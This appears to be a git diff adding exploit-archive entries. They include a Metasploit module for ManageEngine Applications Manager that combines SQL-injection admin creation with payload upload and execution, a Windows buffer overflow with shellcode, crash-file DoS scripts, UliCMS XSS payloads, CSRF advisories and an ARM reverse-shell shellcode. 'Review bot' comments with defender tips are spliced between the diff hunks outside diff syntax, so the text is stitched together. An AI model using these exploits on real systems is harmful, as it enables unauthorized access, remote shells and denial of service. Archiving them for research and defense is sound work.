diff --git a/exploits/hardware/dos/46733.py b/exploits/hardware/dos/46733.py
new file mode 100755
index 000000000..3b700a247
--- /dev/null
+++ b/exploits/hardware/dos/46733.py
@@ -0,0 +1,29 @@
+#!/usr/bin/python
+# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
+# Date: 19/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.qnap.com
+# Version: 1.3.4.0317 and below are vulnerable
+# Software Link: https://www.qnap.com/en/utilities/essentials
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP/7/10 (version 1.3.3.0925)
+# CVE: CVE-2019-7181
+# POC
+# 1.) Generate qnap.txt
+# 2.) Copy the contents of qnap.txt to the clipboard
+# 3.) Paste the contents in any username/password field(Add or Edit VPN)
+# 4.) Click ok, program crashes.
+# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
+
+buffer = "A" * 1000
+
+payload = buffer
+try:
+ f=open("qnap.txt","w")
+ print "[+] Creating %s bytes QNAP payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
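Review bot: The bare `except:` at the end of the script swallows every error (including KeyboardInterrupt) and prints only "File cannot be created", and the handle from `open` is never closed if `f.write` raises. Write the file as `with open("qnap.txt", "w") as f: f.write(payload)` and catch `except IOError as e:` so the real cause is printed. The same writer pattern is repeated in 46732.py and 46737.py. The header says a new version has been released but never names it; a line such as `# Fixed in: <fixed version — not stated here>` would let defenders confirm they are patched.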
diff --git a/exploits/multiple/dos/46735.html b/exploits/multiple/dos/46735.html
new file mode 100644
index 000000000..66a6f92d8
--- /dev/null
+++ b/exploits/multiple/dos/46735.html
@@ -0,0 +1,47 @@
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/remote/46740.rb b/exploits/multiple/remote/46740.rb
new file mode 100755
index 000000000..f1ea72b9a
--- /dev/null
+++ b/exploits/multiple/remote/46740.rb
@@ -0,0 +1,313 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "ManageEngine Applications Manager < 14.0 - Authentication Bypass / Remote Command Execution",
+ 'Description' => %q(
+ This module exploits sqli and command injection vulnerability in the ManageEngine AM 14 and prior versions.
+ It is completely different from the previous EDB-ID:46725 exploit.
+
+ Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides authentication bypass.
+ Therefore an unauthenticated user can gain the authority of "system" on the server.
+ It uploads malicious file using the "Execute Program Action(s)" feature of the app with the new admin account.
+
+ Tested: Applications Manager 14 on Linux 64-bit (PostgreSQL)
+ Applications Manager 14 on Windows 10 64-bit (MSSQL)
+ Applications Manager 14 on Windows 10 64-bit (PostgreSQL)
+ Applications Manager 13 on Windows Server 2012 R2 64-bit (MSSQL)
+ Applications Manager 12 on Windows Server 2012 R2 64-bit (PostgreSQL)
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://pentest.com.tr/exploits/ManageEngine-App-Manager-14-Auth-Bypass-Remote-Command-Execution.html' ]
+ ],
+ 'DefaultOptions' =>
+ {
+ 'WfsDelay' => 60, # countermeasure
+ 'RPORT' => 8443,
+ 'SSL' => true
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ },
+ 'Platform' => ['unix', 'win', 'linux'],
+ 'Targets' =>
+ [
+ [ 'Windows Target',
+ {
+ 'Platform' => ['win'],
+ 'Arch' => ARCH_CMD,
+ }
+ ],
+ [ 'Linux Target',
+ {
+ 'Platform' => ['unix','linux'],
+ 'Arch' => ARCH_CMD,
+ 'Payload' =>
+ {
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'generic perl ruby python',
+ }
+ }
+ }
+ ]
+ ],
+ 'DisclosureDate' => '22 April 2019',
+ 'DefaultTarget' => 1))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path of ME', '/'])
+ ],self.class)
+ end
+
+ def peer
+ "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+ end
+
+ def print_status(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def print_error(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def print_good(msg='')
+ super("#{peer} - #{msg}")
+ end
+
+ def exec(action)
+ # operation of malicious file. The end of the adventure :(
+ send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'),
+ 'cookie' => @cookie,
+ 'vars_get' => {
+ 'method' => 'testAction',
+ 'actionID' => action,
+ 'haid' => 'null'
+ }
+ )
+ end
+##
+# platform check
+##
+ def check_platform
+ # First touch to support of execute program ;)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'showTile.do'),
+ 'cookie' => @cookie,
+ 'vars_get' => {
+ 'TileName' => '.ExecProg',
+ 'haid' => 'null',
+ }
+ )
+ if res && res.code == 200 && res.body.include?('createExecProgAction')
+ # Platform can be discovered precisely using an application dir.
+ @dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0] # It will be recalled later
+ if @dir =~ /:/
+ platform = Msf::Module::Platform::Windows
+ else
+ platform = Msf::Module::Platform::Unix
+ end
+ else
+ fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
+ end
+ file_up(platform, @dir)
+ end
+##
+# Creating and sending malicious files
+##
+ def file_up(platform, dir)
+ # specifying an extension by platform
+ if platform == Msf::Module::Platform::Windows
+ filex = ".bat"
+ else
+ if payload.encoded =~ /sh/
+ filex = ".sh"
+ elsif payload.encoded =~ /perl/
+ filex = ".pl"
+ elsif payload.encoded =~ /python/
+ filex = ".py"
+ elsif payload.encoded =~ /ruby/
+ filex = ".rb"
+ else
+ fail_with(Failure::Unknown, 'Payload type could not be checked!')
+ end
+ end
+
+ @fname= rand_text_alpha(9 + rand(3)) + filex
+ data = Rex::MIME::Message.new
+ data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
+ data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'data' => data.to_s,
+ 'agent' => 'Mozilla',
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'cookie' => @cookie,
+ 'uri' => normalize_uri(target_uri, "Upload.do")
+ })
+
+ if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+ print_good("#{@fname} malicious file has been uploaded.")
+ create_exec_prog(dir, @fname) # Great. Let's send them somewhere else o_O
+ else
+ fail_with(Failure::Unknown, 'The file could not be uploaded!')
+ end
+ end
+
+ def create_exec_prog(dir, fname)
+
+ @display = rand_text_alphanumeric(7)
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'adminAction.do'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
+ 'method' => 'createExecProgAction',
+ 'id' => 0,
+ 'displayname' => @display,
+ 'serversite' => 'local',
+ 'choosehost' => -2,
+ 'abortafter' => 5, # I think it would be enough for once. But I gave 5 O_o
+ 'command' => fname,
+ 'execProgExecDir' => dir,
+ 'cancel' => 'false'
+ }
+ )
+
+ if res && res.code == 200 && res.body.include?('icon_message_success') # Success icon control
+ # Find actionID simply from body res
+ actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0]
+ print_status("Transactions completed. Attempting to get a session...")
+ exec(actionid)
+ else
+ fail_with(Failure::Unreachable, 'Connection error occurred!')
+ end
+
+ end
+##
+# Check all
+##
+ def check
+ # Instead of detecting the database type, we can guarantee the vuln by sending a separate query to both.
+ # The platform can be linux and possible remotely connected to the MSSQL database.
+ # In the same way platform can be windows and postgresql can be used.
+ # Thats why we are sending two queries. We will check the platform inside.
+ @uname = Rex::Text.rand_text_alpha_lower(6)
+ uid = rand_text_numeric(3)
+ apk = rand_text_numeric(6)
+ @pwd = rand_text_alphanumeric(8+rand(9))
+ # MSSQL injection should be prepared with ASCII characters.
+ # Map and join can be used for this.
+ @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
+ @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)" # "ADMIN" CHARs - should not be random
+ # PostgreSQL injection query // no need APIKEY
+ pg_user =""
+ pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
+ pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
+ pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
+ # MSSQL injection query
+ ms_user =""
+ ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
+ ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
+ ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
+ # Send SQL queries to both types of database(PostreSQL,MSSQL) with SQLi vuln..
+ use_sqli(ms_user, pg_user)
+
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'applications.do'),
+ )
+ # If the user we sent with queries was created, the login will be successful with new admin user.
+ if res && res.code == 200 && res.body.include?('.loginDiv') # css control makes more sense. The application language may not be English.
+ @cookie = res.get_cookies
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'j_security_check'),
+ 'cookie' => @cookie,
+ 'vars_post' => {
+ 'clienttype' => 'html',
+ 'j_username' => @uname,
+ 'j_password' => @pwd
+ }
+ )
+
+ if res && res.code == 302 && res.body.include?('Redirecting to')
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'applications.do'),
+ 'cookie' => @cookie
+ )
+ @cookie = res.get_cookies # last cookie
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ else
+ return Exploit::CheckCode::Safe
+ end
+
+ end
+
+ def exploit
+ unless Exploit::CheckCode::Vulnerable == check
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+ end
+ print_good("Excellent! Logged in as #{@uname}")
+ print_status("Admin Username => #{@uname}")
+ print_status("Admin Password => #{@pwd}")
+ check_platform # Start the adventure
+ end
+##
+# Communication with the database
+##
+ def use_sqli(mssql, postgresql)
+ # two different post data must be sent.
+ # Because the query structures are different.
+ send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+ 'vars_post' => {
+ 'resourceid' => mssql
+ }
+ )
+ # important to send the +/$ characters clear
+ send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
+ 'data' => "resourceid=#{postgresql}"
+ }, 25)
+
+ end
+end
+##
+# The end of the codes (o_O) // AkkuS
+##
\ No newline at end of file
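Review bot: `check` is not a read-only probe: it pushes both INSERT statements through `use_sqli` and then logs in with the new account, so running a check alone leaves an ADMIN-group row in `AM_UserPasswordTable`/`AM_UserGroupTable` that nothing in the module removes. Say so above `def check`, e.g. `# NOTE: intrusive - creates a persistent admin account on the target; it must be removed after an authorised test`. `Msf::Exploit::FileDropper` is included but `register_file_for_cleanup` is never called, so the uploaded script also stays on the server. `res.get_cookies` after the second `applications.do` request and the `split(...)[1]` parsing in `check_platform` and `create_exec_prog` run on values that can be nil, and would raise NoMethodError rather than reach `fail_with`. For defenders, the artefacts this code produces are unauthenticated POSTs to `jsp/FaultTemplateOptions.jsp` whose `resourceid` carries SQL text, unexpected rows in those two tables, and new entries under Execute Program Action(s).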
diff --git a/exploits/php/webapps/46734.txt b/exploits/php/webapps/46734.txt
new file mode 100644
index 000000000..98e9740d7
--- /dev/null
+++ b/exploits/php/webapps/46734.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Contact Form Builder [CSRF → LFI]
+# Date: 2019-03-17
+# Exploit Author: Panagiotis Vagenas
+# Vendor Homepage: http://web-dorado.com/
+# Software Link: https://wordpress.org/plugins/contact-form-builder
+# Version: 1.0.67
+# Tested on: WordPress 5.1.1
+
+Description
+-----------
+
+Plugin implements the following AJAX actions:
+
+- `ContactFormMakerPreview`
+- `ContactFormmakerwdcaptcha`
+- `nopriv_ContactFormmakerwdcaptcha`
+- `CFMShortcode`
+
+All of them call the function `contact_form_maker_ajax`. This function
+dynamicaly loads a file defined in `$_GET['action']` or
+`$_POST['action']` if the former is not defined. Because of the way
+WordPress defines the AJAX action a user could define the plugin action
+in the `$_GET['action']` and AJAX action in `$_POST['action']`.
+Leveraging that and the fact that no sanitization is performed on the
+`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
+file using directory traversal thus leading to Local File Inclusion
+vulnerability.
+
+PoC
+---
+
+```html
+
+```
\ No newline at end of file
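Review bot: The advisory stops at the PoC and gives no remediation or fixed version, and the fenced `html` block under PoC is empty, so a reader cannot tell what to check or whether 1.0.67 has a patched successor. From the description, the fix would presumably be for `contact_form_maker_ajax` to map `action` onto a fixed allow-list of file names instead of using `$_GET['action']` in the include path, and to verify a WordPress nonce on these AJAX actions. A header line such as `# Fixed in: <fixed version — not stated here>` would complete the record.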
diff --git a/exploits/php/webapps/46738.html b/exploits/php/webapps/46738.html
new file mode 100644
index 000000000..31133a1de
--- /dev/null
+++ b/exploits/php/webapps/46738.html
@@ -0,0 +1,55 @@
+# Exploit Title: 74CMS v5.0.1 has a CSRF vulnerability to add a new admin user
+# Date: 2019-04-14
+# Exploit Author: ax8
+# Vendor Homepage: https://github.com/Li-Siyuan
+# Software Link: http://www.74cms.com/download/index.html
+# Version: v5.0.1
+# CVE : CVE-2019-11374
+
+
+
+74CMS v5.0.1 has a CSRF vulnerability to add a new admin user via the index.php?m=Admin&c=admin&a=add URI.
+
+
+
+
+
+
+
+
+
+
+
+ CSRF Proof
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
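Review bot: `# Vendor Homepage: https://github.com/Li-Siyuan` does not match the product: the software link is 74cms.com, and the identical homepage line appears in 46739.html for Msvod, so it looks copied between the two entries and should point at each vendor's own site. Neither file names a fixed version or the mitigation. Going by the one-line descriptions, the admin `a=add` action here and `admin/member/edit.html` in 46739.html would need a per-session anti-CSRF token verified server-side. The PoC markup is blank in this view, so the form itself cannot be reviewed.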
diff --git a/exploits/php/webapps/46739.html b/exploits/php/webapps/46739.html
new file mode 100644
index 000000000..b19234bae
--- /dev/null
+++ b/exploits/php/webapps/46739.html
@@ -0,0 +1,68 @@
+# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information
+
+# Date: 2019-04-14
+# Exploit Author: ax8
+# Vendor Homepage: https://github.com/Li-Siyuan
+# Software Link: https://www.msvodx.com/
+# Version: v10
+# CVE : CVE-2019-11375
+
+
+
+Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.
+
+
+
+
+
+
+
+
+
+
+
+ CSRF Proof
+
+
+
+
+
+
+
+
+
+
+
+
+
+MISC:http://www.iwantacve.cn/index.php/archives/198/
\ No newline at end of file
diff --git a/exploits/php/webapps/46741.txt b/exploits/php/webapps/46741.txt
new file mode 100644
index 000000000..ce87cd90c
--- /dev/null
+++ b/exploits/php/webapps/46741.txt
@@ -0,0 +1,43 @@
+# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
+# Google Dork: intext:"by UliCMS"
+# Exploit Author: Kağan EĞLENCE
+# Vendor Homepage: https://en.ulicms.de/
+# Version: 2019.2 , 2019.1
+# CVE : CVE-2019-11398
+
+### Vulnerability 1
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/loginform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result :
+
+### Vulnerability 2
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
+Vulnerable File : /ulicms/admin/inc/registerform.php
+Request Type: GET
+Vulnerable Parameter : "go"
+Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)
+
+Result :
+
+### Vulnerability 3 - Authenticated
+
+Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+Request Type: GET
+Vulnerable Parameter : "error"
+Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
+
+### History
+=============
+2019-04-13 Issue discovered
+2019-04-13 Vendor contacted
+2019-04-13 Vendor response and hotfix
+2019-04-14 Vendor releases fixed versions
+2019-04-22 Advisory release
\ No newline at end of file
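Review bot: The History section records `Vendor releases fixed versions` on 2019-04-14, but the header lists only the affected `2019.2 , 2019.1`, so the advisory never says which release to upgrade to; add `# Fixed in: <fixed version — not stated here>`. In Vulnerability 2 the `Url` uses `go=test…` while the `Payload` line uses `go=asd…`; the two should agree. The `go` values close a single-quoted attribute, which suggests the parameter is echoed into an attribute in `loginform.php`/`registerform.php` without attribute-context encoding. Stating that root cause would help maintainers verify the hotfix.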
diff --git a/exploits/windows/dos/46732.py b/exploits/windows/dos/46732.py
new file mode 100755
index 000000000..906aad363
--- /dev/null
+++ b/exploits/windows/dos/46732.py
@@ -0,0 +1,28 @@
+# Exploit Title: Ease Audio Converter 5.30 Audio Cutter Dos Exploit
+# Date: 19.04.19
+# Vendor Homepage:http://www.audiotool.net/download.htm
+# Software Link: http://www.audiotool.net/download/audioconverter.exe
+# Exploit Author: Achilles
+# Tested Version: 5.30
+# Tested on: Windows 7 x64 Sp1
+
+# 1.- Run the python script, it will create a new file with the name "Evil.mp4"
+# 2.- Open AudioConverter.exe and Click Function and choose Audio Cutter
+# 3.- Load the file "Evil.mp4"
+# 4.- Click ok
+# 5.- Click Gut
+# 5.- And you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+ f=open("Evil.mp4","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
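Review bot: `#!/usr/bin/env python` sits below the header comments, so it is an ordinary comment and this 100755 file has no interpreter line; it belongs on line 1. The step list numbers two items `5.-`, and `Click Gut` is presumably `Click Cut`. The header names only the tested version 5.30 and gives no CVE, vendor-contact or fix status, which is what a defender needs to track this entry.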
diff --git a/exploits/windows/local/46737.py b/exploits/windows/local/46737.py
new file mode 100755
index 000000000..b72835fea
--- /dev/null
+++ b/exploits/windows/local/46737.py
@@ -0,0 +1,36 @@
+#!/usr/bin/python
+# Exploit Title: LabF nfsAxe 3.7 Ping Client - Buffer Overflow (Vanilla)
+# Date: 20-04-2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: http://www.labf.com/nfsaxe
+# Version: 3.7
+# Software Link : http://www.labf.com/download/nfsaxe.exe
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP SP3 ENG x86
+# CVE: TBC from Mitre
+# PoC:
+# 1.) Generate nfsaxeping.txt, copy the contents to clipboard.
+# 2.) In the application(ping.exe) paste contents of clipboard in to "Host IP" and click ok.
+# 3.) Click Start and calc pops
+#0x775a693b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.6435 (C:\WINDOWS\system32\ole32.dll)
+#Special thanks to John Leitch for the Windows XP SP3 EN Calc Shellcode (16 Bytes)
+
+shellcode = ("\x31\xC9"
+ "\x51"
+ "\x68\x63\x61\x6C\x63"
+ "\x54"
+ "\xB8\xC7\x93\xC2\x77"
+ "\xFF\xD0")
+
+buffer = "A" * 29 + "\x3b\x69\x5a\x77" + "\x90" * 10 + shellcode + "C" * (220-29-4-10-16)
+
+payload = buffer
+try:
+ f=open("nfsaxeping.txt","w")
+ print "[+] Creating %s bytes ping payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
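Review bot: The header should state the environment this PoC depends on, which currently has to be inferred from the `jmp esp` comment: a return address inside an `ole32.dll` build reported as `ASLR: False, Rebase: False` on Windows XP SP3, with the bytes after it apparently executed from the stack. As written it is tied to that DLL version and to a system without DEP/ASLR, which deserves a line such as `# Scope: XP SP3 x86 only; relies on a non-ASLR ole32.dll and an executable stack`. `CVE: TBC from Mitre` and the missing fixed version leave defenders with no identifier to track. The title says `(Vanilla)` while files_exploits.csv labels the entry `(Direct Ret)`.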
diff --git a/files_exploits.csv b/files_exploits.csv
index ac809f009..17aa7409c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6392,6 +6392,9 @@ id,file,description,date,author,type,platform,port
46722,exploits/multiple/dos/46722.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in sc_FindExtrema4",2019-04-17,"Google Security Research",dos,multiple,
46723,exploits/multiple/dos/46723.txt,"Oracle Java Runtime Environment - Heap Corruption During TTF font Rendering in GlyphIterator::setCurrGlyphID",2019-04-17,"Google Security Research",dos,multiple,
46726,exploits/multiple/dos/46726.txt,"Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)",2019-04-18,"Fakhri Zulkifli",dos,multiple,
+46732,exploits/windows/dos/46732.py,"Ease Audio Converter 5.30 - '.mp4' Denial of Service (PoC)",2019-04-22,Achilles,dos,windows,
+46733,exploits/hardware/dos/46733.py,"QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service",2019-04-22,"Dino Covotsos",dos,hardware,
+46735,exploits/multiple/dos/46735.html,"Google Chrome 73.0.3683.103 V8 JavaScript Engine - Out-of-Memory in Invalid Table Size Denial of Service (PoC)",2019-04-22,"Bogdan Kurinnoy",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10429,6 +10432,7 @@ id,file,description,date,author,type,platform,port
46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,
+46737,exploits/windows/local/46737.py,"LabF nfsAxe 3.7 Ping Client - 'Host IP' Buffer Overflow (Direct Ret)",2019-04-22,"Dino Covotsos",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17346,6 +17350,7 @@ id,file,description,date,author,type,platform,port
46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
+46740,exploits/multiple/remote/46740.rb,"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)",2019-04-22,AkkuS,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41166,3 +41171,7 @@ id,file,description,date,author,type,platform,port
46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80
46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows,
46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,
+46734,exploits/php/webapps/46734.txt,"WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion",2019-04-22,"Panagiotis Vagenas",webapps,php,80
+46738,exploits/php/webapps/46738.html,"74CMS 5.0.1 - Cross-Site Request Forgery (Add New Admin User)",2019-04-22,ax8,webapps,php,80
+46739,exploits/php/webapps/46739.html,"Msvod 10 - Cross-Site Request Forgery (Change User Information)",2019-04-22,ax8,webapps,php,80
+46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 50c4f5635..a03003442 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -957,3 +957,4 @@ id,file,description,date,author,type,platform
46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
+46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
diff --git a/shellcodes/arm/46736.txt b/shellcodes/arm/46736.txt
new file mode 100644
index 000000000..02843cc85
--- /dev/null
+++ b/shellcodes/arm/46736.txt
@@ -0,0 +1,100 @@
+/*
+* Title: Linux/ARM - Password-Protected Reverse TCP Shell
+* Date: 2019-04-20
+* Tested: armv6 (32-bit Raspberry Pi I)
+* Author: Alan Vivona - @syscall59 - medium.syscall59.com
+* Size: 100 bytes
+* No null bytes / Null-free
+*/
+
+.section .text
+.global _start
+_start:
+
+.arm
+ add r3, pc, #1 // switch to thumb mode
+ bx r3
+
+.thumb
+
+// [281] socket(2, 1, 0)
+ mov r0, #2
+ mov r1, #1
+ eor r2, r2
+ mov r7, #200
+ add r7, #81
+ svc #1
+mov r10, r0 // save sockfd into r10
+
+// [283] connect(socketfd, target, addrlen)
+ // socket fd is in r0 already
+ adr r1, target
+ strb r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
+ strb r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
+ strb r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
+ mov r2, #16
+ add r7, #2 // 281 + 2 = 283
+ svc #1
+
+// [003] read(sourcefd, destbuffer, amount)
+ push {r1}
+ mov r1, sp
+ mov r2, #4
+ mov r7, #3
+ read_pass:
+ mov r0, r10
+ svc #1
+ check_pass:
+ ldr r3, pass
+ ldr r4, [r1]
+ eor r3, r3, r4
+ bne read_pass
+
+// [063] dup2(sockfd, stdIO)
+ mov r1, #2 // r1 = 2 (stderr)
+ mov r7, #63 // r7 = 63 (dup2)
+ loop_stdio:
+ mov r0, r10 // r0 = saved sockfd
+ svc #1
+ sub r1,#1
+ bpl loop_stdio // loop while r3 >= 0
+
+// [011] execve(command, 0, 0)
+ adr r0, command
+ eor r2, r2
+ eor r1, r1
+ strb r2, [r0, #7]
+ mov r7, #11
+ svc #1
+
+// 2 bytes aligment fix if needed needed (can't use a nop as it has a null byte)
+// align_bytes : .byte 0xff, 0xff
+
